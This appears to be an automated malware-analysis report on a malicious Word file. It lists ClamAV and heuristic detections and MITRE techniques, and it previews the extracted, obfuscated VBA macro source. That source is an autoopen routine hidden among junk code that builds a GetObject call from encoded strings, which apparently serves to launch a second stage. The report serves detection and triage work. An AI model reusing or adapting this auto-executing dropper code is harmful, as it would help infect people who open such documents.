MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is identified as malicious by ClamAV and contains VBA macros, specifically an autoopen macro that executes a GetObject call. This indicates the document is designed to run malicious code upon opening, likely to download and execute a second-stage payload. The presence of obfuscated VBA code and the autoopen macro strongly suggest a macro-based malware delivery.
Heuristics 7
-
ClamAV: Doc.Malware.00536d-6935147-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6935147-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20242 bytes |
SHA-256: 012e60b2d38a9da645748dc911851532d1f5353a540857d78f5aae6a85a26f05 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "VUDU4Ck"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "JQQ__cXC"
Attribute VB_Base = "0{A32E9AA0-A660-4C4E-88C7-6F7AF43DF76B}{324022BB-4127-4E0A-B8F1-7B2D87FACF31}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "MUUBAA"
Attribute VB_Base = "0{D68E7160-302E-405F-B97A-FA06847CDF50}{353E8415-77CE-442B-923B-7B4110734E4C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "zAABXxA"
Function wAAc4UB1()
If mAooxB > s4ZZUXQA Then
BUAccA = 731226401 - iDUQDBG
If kAkABUo < MkUBUAA Then
Day Atn(mAAAAD)
End If
End If
Set XBUAADA = wQBAkQ
If oQoAAD > m_ccw4 Then
j_CcA4A = 771481287 - F_GAQXQU
If r_ZGBo < BBo1c1x_ Then
Day Atn(KADDAA14)
End If
End If
Set pwBDBQwc = T4DADD
If bAAQAA > HAXAAD Then
NAAxcX = 754631206 - EA4AAA
If n4AAGQ < sAAQXA Then
Day Atn(NAwQXA1C)
End If
End If
Set VxxZ4Z = oAABDA
End Function
Sub autoopen()
YwZwAA
End Sub
Function u11BU1Z()
If UZZAAC > ZAXAoZo_ Then
LQcBo_ = 905491430 - jCAU4B
If LDGoUc < wAAAQADB Then
Day Atn(JBAAQQB)
End If
End If
Set LB4AxA = VAZBDBC
If PUDwkA > nDDXAA Then
FAAAXA = 590727669 - uUZ1AACA
If CXB1X4B < XAAZBX4 Then
Day Atn(wokXAwx)
End If
End If
Set RAADAAcA = EU4ADUQA
If PCAxA4 > iUUCGUAX Then
CAcQAQ = 654363851 - p1UDCAx
If tkXUAAAA < WDCoABD Then
Day Atn(GCD_cCGo)
End If
End If
Set bABAADc = zDBkxD
End Function
Attribute VB_Name = "cA4AUDU"
Function ixkkBDo()
If kQwkAk > VA4kAGD Then
qQAAAQD = 150794104 - YD_AkxBA
If cco4AD < nXoGUB Then
Day Atn(uQcAC1UC)
End If
End If
Set IZkcQBAo = LUBkoUkB
If sQAAQxZ > ikUDoww Then
TAoACw1 = 99533539 - EUBAAx
If kUQ1GQ < iXDBGAU Then
Day Atn(lCAXDUA)
End If
End If
Set Gx14DCcZ = DcAB1ADx
End Function
Function YwZwAA()
On Error Resume Next
If bXZoAoCA > mUQ1cA Then
FQUBokQA = 860465702 - hcAcAAAA
If kAoAoA < TDABAQA Then
Day Atn(TkQxAc)
End If
End If
Set zUQZAA = VAZAcABA
If SGXGA_ > NkADAZA Then
LQDwA4 = 123997924 - KBAAA4X
If MQAAQwBA < L4AQUAUA Then
Day Atn(EDZAAoA)
End If
End If
Set rAAQGA = BkU_cACA
If zADwDAAB > ZwUGkkA Then
MBwCAk4 = 541157500 - wXUA1QBB
If YAcGw1AQ < nAQAxUAX Then
Day Atn(aAAADAAA)
End If
End If
Set dBXoAB = nBAACAkG
oAAcDA = MUUBAA.cCCAAQ + MUUBAA.H_AABACA + MUUBAA.cCCAAQ + MUUBAA.AQAAoA_ + MUUBAA.cCCAAQ
If HUXDkAk1 > BAkxoDX Then
TQA1B_w = 645429478 - UCAZx_BC
If ODDGGDAZ < pkAAGAZA Then
Day Atn(UBBQA1Ak)
End If
End If
Set GDwkxX = ZAAAAAA
If G4A1AUA > GDA1AC Then
JAUoXU = 454486954 - PAQ_UA1
If qkAGoZA < lADGU1 Then
Day Atn(zZCocAUU)
End If
End If
Set hAAAo_ = VQBo_B
Set Zx1oAZ_ = GetObject(MUUBAA.cCCAAQ + MUUBAA.H_AABACA + MUUBAA.cCCAAQ + MUUBAA.AQAAoA_ + MUUBAA.cCCAAQ + MUUBAA.fQAoXCG + MUUBAA.cCCAAQ)
If CkAADA > MoD_oo Then
nDAkXwAX = 67638643 - PAGAC4X
If SACkUABD < HGDDAwXA Then
Day Atn(LccxAXBA)
End If
End If
Set jcwDkAQU = IQAccwQ
If RZ_oA_c > DBA14A Then
lADAAwBQ = 459710187 - YAAGDA
If uAUQ_XB < LCGZUBA Then
Day Atn(d1AACAU)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.